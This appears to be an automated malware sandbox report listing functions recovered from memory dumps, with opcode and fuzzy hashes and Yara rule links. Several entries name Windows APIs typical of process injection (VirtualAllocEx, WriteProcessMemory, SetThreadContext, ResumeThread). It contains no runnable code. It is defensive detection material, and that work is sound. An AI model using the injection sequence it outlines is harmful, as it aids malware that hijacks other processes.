Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b7331b10091077ded85deb3dea336cd79e6aad07b31f7f7cc1bd7f1bebcf7b
Instruction ID: 6668d28fd13cc5236dc80006fdc5e490c6142c9bcc77fc9a874675000fdaeb18
Opcode Fuzzy Hash: a0b7331b10091077ded85deb3dea336cd79e6aad07b31f7f7cc1bd7f1bebcf7b
Instruction Fuzzy Hash: AFD18F70D0424AEFCB04CFA5C4814AEFBB2FF89340B64D59AC415AB265D734EA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02592FE0, Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11cda5cac0e4e0f68faa6c051792c182758d6aaa532d268269efbcd1fb810e3
Instruction ID: 0e238c836fb18c60a0677283d98ad2f13655eacc2010d7056d3b0caf4e92aa7a
Opcode Fuzzy Hash: b11cda5cac0e4e0f68faa6c051792c182758d6aaa532d268269efbcd1fb810e3
Instruction Fuzzy Hash: D8D15B74D0420AEFCB04CFA6C4818AEFBB2FF89340B54D599C516AB265D734EA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02590F21, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b849f85e4a565454f2503003b6feb4afd6dbfa206f9a2dda8a8531f576f812d5
Instruction ID: fb46b40b912a3ff607318e6c8c69a5f1792d942885d94c6b97a4f3bce1212677
Opcode Fuzzy Hash: b849f85e4a565454f2503003b6feb4afd6dbfa206f9a2dda8a8531f576f812d5
Instruction Fuzzy Hash: B2C17875E002498FCB08CFA5D881AEEFBF2FF89310F28846AC549AB255D7359842CF14

Uniqueness

Uniqueness Score: -1.00%

Function 045D0FC0, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.251394511.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9e73950e8fd146e112f131ac576ac5b6136e10fdda468de8bf553593706cf6
Instruction ID: fc794e6ccf7f5742122626af0a9982cadbf14b5acce9d15c9148b3fe5c260707
Opcode Fuzzy Hash: 8a9e73950e8fd146e112f131ac576ac5b6136e10fdda468de8bf553593706cf6
Instruction Fuzzy Hash: 51B17F71A006159FCB24DFA9D984A9DB7F2FF88304F168468E815AB2A1DB31FD41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02590F88, Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb65e7320a41297ce4a6c6456468a75f3afad0e0ff260dad251d3d7f7ffb64e
Instruction ID: 6d91567f5170777cc7d266c93fbd8f3c9c554b3dc420ff4e2a96a30818ff52d7
Opcode Fuzzy Hash: 7cb65e7320a41297ce4a6c6456468a75f3afad0e0ff260dad251d3d7f7ffb64e
Instruction Fuzzy Hash: A2B16775E042498FDB08CFA5D8916EEBBF2FF89310F28846AC449BB255DB359842CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02591028, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6158050ec2ae01f31a318d096b2c26c2970ee79908b45faf87b5fdd144fbe31b
Instruction ID: 3a790a6679a5362fe4eed4b1df12f3273959d0662503387e2a62c9c00b41a32b
Opcode Fuzzy Hash: 6158050ec2ae01f31a318d096b2c26c2970ee79908b45faf87b5fdd144fbe31b
Instruction Fuzzy Hash: 9A91D574E006198FCB08CFEAC984AAEBBB2BF89300F14952AD519BB354DB319941CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0259EC50, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50331f0fc5ef0741cfcdc60940c5ffa128156712f73c7595b5831d6a4635b2f7
Instruction ID: 2b517cd254a6800e055c8c73dfa0288f048a889935a01915136eef4d849e47a6
Opcode Fuzzy Hash: 50331f0fc5ef0741cfcdc60940c5ffa128156712f73c7595b5831d6a4635b2f7
Instruction Fuzzy Hash: D0615A70E0520A9FCB44DFA5C5416AEFBB6FB89200F149926D015BB364D7389A01CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 045D35E8, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.251394511.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b19fab42006029ad5dca04368b86b461158926b3081d6938c393fa415d8634
Instruction ID: 014630b59ba70abdb8e96f1d6a929e626a195fc7804527a215e197d44dd31319
Opcode Fuzzy Hash: e1b19fab42006029ad5dca04368b86b461158926b3081d6938c393fa415d8634
Instruction Fuzzy Hash: D9518CB0A06208CFCB14CFA9D8446EDBBF2FF8A310F14946AE405B7264D734A940DF25

Uniqueness

Uniqueness Score: -1.00%

Function 025917D0, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4a17ba2aba753e0f1723a48fbcb2bb60bbf7b04881ed5539177740f1d30cdc
Instruction ID: 10e6fd3293d9eb318458e319896e8d9855238efdfe53815a1e8813d64538bcd2
Opcode Fuzzy Hash: bf4a17ba2aba753e0f1723a48fbcb2bb60bbf7b04881ed5539177740f1d30cdc
Instruction Fuzzy Hash: 19513D74E0461A8FDB04CFA6D5906AEFBF2FF88310F14D46AD41AA7254D7344A42CF98

Uniqueness

Uniqueness Score: -1.00%

Function 02592168, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a14b1111758531f34b33e790fac8e58921fff3a16776f005e25f01cf173dfc
Instruction ID: 94fe17965dfc38275317e7bb3736736def0f863249c476d869734f55ca988ae5
Opcode Fuzzy Hash: 74a14b1111758531f34b33e790fac8e58921fff3a16776f005e25f01cf173dfc
Instruction Fuzzy Hash: 9521F871E056588BDB18CFAAD9402DEBBF3AFC9310F15C06AD908A7268DB341A46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9E5B8, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AB9E87F

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7cdc0c82e76870d737b641d706331c511ceafb4320fcdf532fef02e16f401849
Instruction ID: 3668efb64f484c8121a5897db7c4de9486ddce7d9b5de4c3e87860a6b032ecbc
Opcode Fuzzy Hash: 7cdc0c82e76870d737b641d706331c511ceafb4320fcdf532fef02e16f401849
Instruction Fuzzy Hash: E6C11371D042298FDF20CFA8C884BEDBBB1BF49304F0585A9E519B7240DB749A89DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9E230, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AB9E303

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1b96f5ecc187f06eda49412a8727b6da788dc89e1d3a1f7b3cb4659fdc7bc142
Instruction ID: 258a61834e66772774b91686b1ff3d2f97f42e377b19ef853d442b7fcb4d9031
Opcode Fuzzy Hash: 1b96f5ecc187f06eda49412a8727b6da788dc89e1d3a1f7b3cb4659fdc7bc142
Instruction Fuzzy Hash: 0341A9B5D052589FCF00CFA9D984AEEFBF1BB49314F14942AE818B7240D738AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9E388, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AB9E43A

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 85a3f88e4967c4c9ebf6e0068a7357f074ebc90122bf5761bba7cedfe43dc12c
Instruction ID: 9614f10fcaa18fe6cd113594b6765e7ab518ceefd8b95ca94fd5ef5d2932b86f
Opcode Fuzzy Hash: 85a3f88e4967c4c9ebf6e0068a7357f074ebc90122bf5761bba7cedfe43dc12c
Instruction Fuzzy Hash: BC41A8B5D042589FCF10CFA9D984AEEFBB1BB09314F14942AE914B7300D735A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9E110, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AB9E1BA

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6cb0687a73c486e8a7d97e1ba54d21f0027a3ce66a78d6a6dd165b6209228ec1
Instruction ID: 11f129e549339e84a61d06df367198220c8369cb4ae034bd26f5ad4c0c4510fa
Opcode Fuzzy Hash: 6cb0687a73c486e8a7d97e1ba54d21f0027a3ce66a78d6a6dd165b6209228ec1
Instruction Fuzzy Hash: 6631A7B9D042589FCF10CFA9D984ADEFBB1BB49310F14942AE814BB300D735A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02597E20, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02597ECF

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fa2051493ea3bf685df26ba7fca22e43f96a914409868296fb76c5f14bf8f5a7
Instruction ID: 8a7387dad2ce90db7298e19d3380db839e4632e9b6d405d31d8747727a9e5da2
Opcode Fuzzy Hash: fa2051493ea3bf685df26ba7fca22e43f96a914409868296fb76c5f14bf8f5a7
Instruction Fuzzy Hash: 9C31A8B9D042589FCF10CFA9D584ADEFBB1BB09310F24942AE818BB210D334AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9DFE8, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 0AB9E097

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: e48faa4dbe19bd393f08af0c072c90a937c977cfcfdcc72d2948a19ebef6ac94
Instruction ID: d6a430b96690273c2627b54d1da2bf6b6fc3805ab54d06d058c5be4be369af2a
Opcode Fuzzy Hash: e48faa4dbe19bd393f08af0c072c90a937c977cfcfdcc72d2948a19ebef6ac94
Instruction Fuzzy Hash: 9D31BAB5D002589FCF10DFAAD984AEEBFF1BB49314F14842AE414B7240D779A989CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02597E28, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02597ECF

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 00dc14fc88c7726ac10e00f79dcd41eabd5eb9871362b4a41a09e855019328fd
Instruction ID: 1d45c71ef17af598a5e3d2b5f88f7247ba7ddb9db6f21c7ed38ebedccbd87c91
Opcode Fuzzy Hash: 00dc14fc88c7726ac10e00f79dcd41eabd5eb9871362b4a41a09e855019328fd
Instruction Fuzzy Hash: 313197B9D042589FCF10CFA9D584ADEFBF4BB19314F14942AE814B7210D734A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 045D1409, Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 045D14AB

Memory Dump Source

Source File: 00000000.00000002.251394511.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 87f9c06264c6f21352d180272d8885776d0e9ad6e1eb5cd69b05dacd79f96dbe
Instruction ID: 2437ef8485cc06d496f9f72a59ea4c46ab62d486ffb642e947fa52936b9e3e4c
Opcode Fuzzy Hash: 87f9c06264c6f21352d180272d8885776d0e9ad6e1eb5cd69b05dacd79f96dbe
Instruction Fuzzy Hash: E23177B9D00208AFCB10CFA9E584ADEFBF5BB49314F14902AE814B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 045D1410, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 045D14AB

Memory Dump Source

Source File: 00000000.00000002.251394511.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aca3ee255c4938f41f969bc7fb8efa4e17a47a66a6ba04cce80c716279100dc9
Instruction ID: 2b4d7680a13da08ddd211080a13fcd1f49b0940dbe8481bdef83552f08f3d9f7
Opcode Fuzzy Hash: aca3ee255c4938f41f969bc7fb8efa4e17a47a66a6ba04cce80c716279100dc9
Instruction Fuzzy Hash: 323187B8D00208AFCB10CFA9E584ADEFBF4BB49310F14902AE814B7310D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0AB9DEF8, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0AB9DF76

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 15310756847521a7fc433601a83517df5396f73ca8569dd8cbfb236b1aa0281d
Instruction ID: 5d83561d36b09026b8abe6040b969419d7e79cd19176d73978ed4d32047c5a43
Opcode Fuzzy Hash: 15310756847521a7fc433601a83517df5396f73ca8569dd8cbfb236b1aa0281d
Instruction Fuzzy Hash: 1731BBB4D042189FCF10CFAAD984ADEFBB5AF49314F14842AE815B7300C735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0A986D09, Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

t, xrefs: 0A986D0D

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID: t
API String ID: 0-2238339752
Opcode ID: 9c362da89c8507aa87dd28b93ced39381f92a5ad4ef040b966a0fbadb55c9cb1
Instruction ID: 608894dcd9163345f51dd8648175b1d6529bb4c293c9561f58c248d5455807f8
Opcode Fuzzy Hash: 9c362da89c8507aa87dd28b93ced39381f92a5ad4ef040b966a0fbadb55c9cb1
Instruction Fuzzy Hash: 11011AB0E0020ADFCB54EF68C545AAEBBB1BF45314F518469D819AB351D7759A02CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0A980040, Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b4df8c70fddc93ba9d1fc6252d38a3ddb16125b82c4378986c3751c49d6263c
Instruction ID: 015a4d2974f32316547264eeb1e8107f39cb54c1f96930d615d3b99871f90f01
Opcode Fuzzy Hash: 8b4df8c70fddc93ba9d1fc6252d38a3ddb16125b82c4378986c3751c49d6263c
Instruction Fuzzy Hash: 44621731910609CFCB14EF68C994AEDB7B1FF55300F1182A9D54AA7265EF70AAC9CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0A98F1C8, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da15886ef4dfa38810c08c9fb57006e205e1c110469c7a99c210ffc540c0842
Instruction ID: 2b9e1eb7ef6521b3fdc6a832e146760aba92c46245ad4cd767cb5c187e20a14c
Opcode Fuzzy Hash: 3da15886ef4dfa38810c08c9fb57006e205e1c110469c7a99c210ffc540c0842
Instruction Fuzzy Hash: 6842E170E10619CFCF24EFA8C8446DCBBB1BF49300F518699D5597B265EB30AA99CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0A98F1C7, Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd788301a005934933686fddc7088d96bdd01612103f80acb8aea0523ccd45b4
Instruction ID: 037560963b7b3bb9099de069a8dac4d7bc2da370178d4230deae4537bd24e1f9
Opcode Fuzzy Hash: cd788301a005934933686fddc7088d96bdd01612103f80acb8aea0523ccd45b4
Instruction Fuzzy Hash: 8032E170E10619CFCF24EFA8C8446DCBBB1BF49300F5186A9D5597B265EB309A99CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0A980006, Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e52ee62e358d94ace7e0524923daf0e601c68a1e45828fc36a266d4d5e7ac91
Instruction ID: 443821c1a968f7b0df42fbcf2348d0df3da0088bc3dd1ffb3d72b6e8780f9375
Opcode Fuzzy Hash: 4e52ee62e358d94ace7e0524923daf0e601c68a1e45828fc36a266d4d5e7ac91
Instruction Fuzzy Hash: EE226B35A10209CFCB15EF28C9946D9BBB1FF55300F1082A9D44AA7265EF71AEC9CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0A98C80C, Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888dc74b6cab916f7bb005105494634ae449c594c1e3ba487f6bc5068a657f52
Instruction ID: eea7dc430739a3a7095a911a78f645596cc16e8c5aebfdcb20a0a4b67a3d87ef
Opcode Fuzzy Hash: 888dc74b6cab916f7bb005105494634ae449c594c1e3ba487f6bc5068a657f52
Instruction Fuzzy Hash: E4B1CEB1F04208DFDB21EFA5C8906AEFBB6FF88300F21056AC505AB295DB359951CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0A989C48, Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2722e6203db9d9da8f7de680bd07259a484fdf3d02dc8f16776cd60b916ffbe7
Instruction ID: 24cac9164f49ac357e328e76279f97b4e4a01b01bed1ca8c5e4db3abf6811de6
Opcode Fuzzy Hash: 2722e6203db9d9da8f7de680bd07259a484fdf3d02dc8f16776cd60b916ffbe7
Instruction Fuzzy Hash: 4EB1BF317042148FCB58EBB4C9949BEB3F7AF89248B2644A9D502EB791DF35EC41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0A986E20, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f381ec400b1057a41431fd290ea4a281a1cf5bfa82d1cd6ff82fff63703238f2
Instruction ID: c53200d76e40e3f5efd2abf91c162b884954bb48fc63cae431d2dcdb27b6d178
Opcode Fuzzy Hash: f381ec400b1057a41431fd290ea4a281a1cf5bfa82d1cd6ff82fff63703238f2
Instruction Fuzzy Hash: 3DB13D74B002098FCB44EFA4C594AADBBF2EF49314F2585A8D505AB361DB36ED45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0A98EBE0, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0007da07f15541505c2b06289f2b24b0835e2a119e76b038c2c23ea3f560a82
Instruction ID: c7d4d4dd8d2effe0894c1e9feb2dd22afc775e92312ec7521c93422b65106349
Opcode Fuzzy Hash: f0007da07f15541505c2b06289f2b24b0835e2a119e76b038c2c23ea3f560a82
Instruction Fuzzy Hash: D491C0B1B10209DFCB11EF68D8986ACBBF5FF45300F11846AE455AB2A5EB30D955CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0A98A330, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c37bfaebad028ccde36b95e9b3f59bd56f4cddaf5d8a782480c095b0a845e1a
Instruction ID: 6771ebb66f8a5405c77da08fe1fb12055c2bd08d6f4bcbf162daa073191f2a64
Opcode Fuzzy Hash: 9c37bfaebad028ccde36b95e9b3f59bd56f4cddaf5d8a782480c095b0a845e1a
Instruction Fuzzy Hash: 698103787106108FCB44EF68D498D6977FABF88A44B1640AAE602CB371DB71EC05CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0A988D08, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a137fc5b742fb8ef413c724286bdd7092c6cb7972462ffdc7f8b4b6081f072e
Instruction ID: 8f910947e415105dc40795722155b1cd72eec94ee613fdb207dc61807681b654
Opcode Fuzzy Hash: 9a137fc5b742fb8ef413c724286bdd7092c6cb7972462ffdc7f8b4b6081f072e
Instruction Fuzzy Hash: 219115B5A0020A9FCB51EF68C880ADEB7F6BF48310F548669E925E7351D730E951CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0A98B978, Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 206e12cdf4cfa080d2daf23a5274a26ef52b06e2401473fafd1482ebd511dbad
Instruction ID: 47acc78042a4e2c38b65cb187a618734a8eed178c62279da4c9bad2e1d2fa156
Opcode Fuzzy Hash: 206e12cdf4cfa080d2daf23a5274a26ef52b06e2401473fafd1482ebd511dbad
Instruction Fuzzy Hash: C981B575B10208DFCB04EFA4D894AADBBB5FF89300F158559E502AB364EB71E945CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0A982094, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f33788c29f6f7cfcee20094465cb410fb9a41cb423024f77a6a1934ba939cc
Instruction ID: d18420878032df99201577e762d0de04417927d3d199694b8c8943697e3a8625
Opcode Fuzzy Hash: c5f33788c29f6f7cfcee20094465cb410fb9a41cb423024f77a6a1934ba939cc
Instruction Fuzzy Hash: 31911B71A00609DFDF14EF68C840AEDB7B5FF49300F118599D959BB251EB30AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0A988CFA, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc12f2bb621a788969600bebff9313ef9776dc078895e42d9bb4d9f12866637d
Instruction ID: 079ef5882f643e711ba1204bfa17541209515ccb6ad5c5f1317336f9fbdf9e18
Opcode Fuzzy Hash: fc12f2bb621a788969600bebff9313ef9776dc078895e42d9bb4d9f12866637d
Instruction Fuzzy Hash: 3F91F5B5A1060A9FCB51DF68C880AEEB7F6BF48310F558659E825E7361E730E941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0A98AF68, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c365b7fad3e73cf95a6e207907434a96b9ac878f4b043ee93722ea3de2c707c4
Instruction ID: ff7e83bd4a89c3dd3daccb7c5d4b8d728330cf50b19e58aee59df6cc157d1e54
Opcode Fuzzy Hash: c365b7fad3e73cf95a6e207907434a96b9ac878f4b043ee93722ea3de2c707c4
Instruction Fuzzy Hash: C7713876B107059FCB20DF79D884A9EB7F1FB48210B148A2AE86AE7750DB34E845CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0A9864E0, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3650f6a69c3a3d466544b0101b736783add6463af94177bcb4132fa392743de5
Instruction ID: 5e451b9bbf8a3f0bbfe12473adb866a6ee8a86a68ecf165f0420f6d3e6784c49
Opcode Fuzzy Hash: 3650f6a69c3a3d466544b0101b736783add6463af94177bcb4132fa392743de5
Instruction Fuzzy Hash: 5951D3B5E052989FCF01DFA8D884ADDFBF4BF09310F15805AE958AB212D335AA46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0A981918, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1834887e1d159e8c687e7c7581b20471ab53977be025d580285d5f36e28f5c05
Instruction ID: ef1142d54ee590861fce4131934acdcfa27c16997c5dc3d1e00b013ebd98b5e4
Opcode Fuzzy Hash: 1834887e1d159e8c687e7c7581b20471ab53977be025d580285d5f36e28f5c05
Instruction Fuzzy Hash: 0B4125667082645FCB1AA334952457E3BE69FC661832A42AAD506CF3D1EF24CC0787D2

Uniqueness

Uniqueness Score: -1.00%

Function 0A98AF59, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e4723607bd1684fb150ff35304fdb4ce91f63a55e945481e01b53baf9cf802
Instruction ID: f6b93b81208f444a08a0abf6cc667965123a1c791dfde7d5821c6b2be2e0ca6c
Opcode Fuzzy Hash: 36e4723607bd1684fb150ff35304fdb4ce91f63a55e945481e01b53baf9cf802
Instruction Fuzzy Hash: 3A513575B007059FCB20DF68D984A9EBBF5FB48210B158A2AE86AE7751DB74E804CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0A985B50, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5664937c0333251ef17d5d6e00adafc008a5da1fedec570a35ba2c5f7af0b6dc
Instruction ID: 829ff9939a303d6bea6b5bfd9997ff2ddc20786c2ac9d96d94f608abf1aa2cc6
Opcode Fuzzy Hash: 5664937c0333251ef17d5d6e00adafc008a5da1fedec570a35ba2c5f7af0b6dc
Instruction Fuzzy Hash: 1161D774B002098FC754EF69C498EA9BBF2AF49714F1A44A8E805AB361DB31E845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0A98CDF8, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254853285.000000000A980000.00000040.00000001.sdmp, Offset: 0A980000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
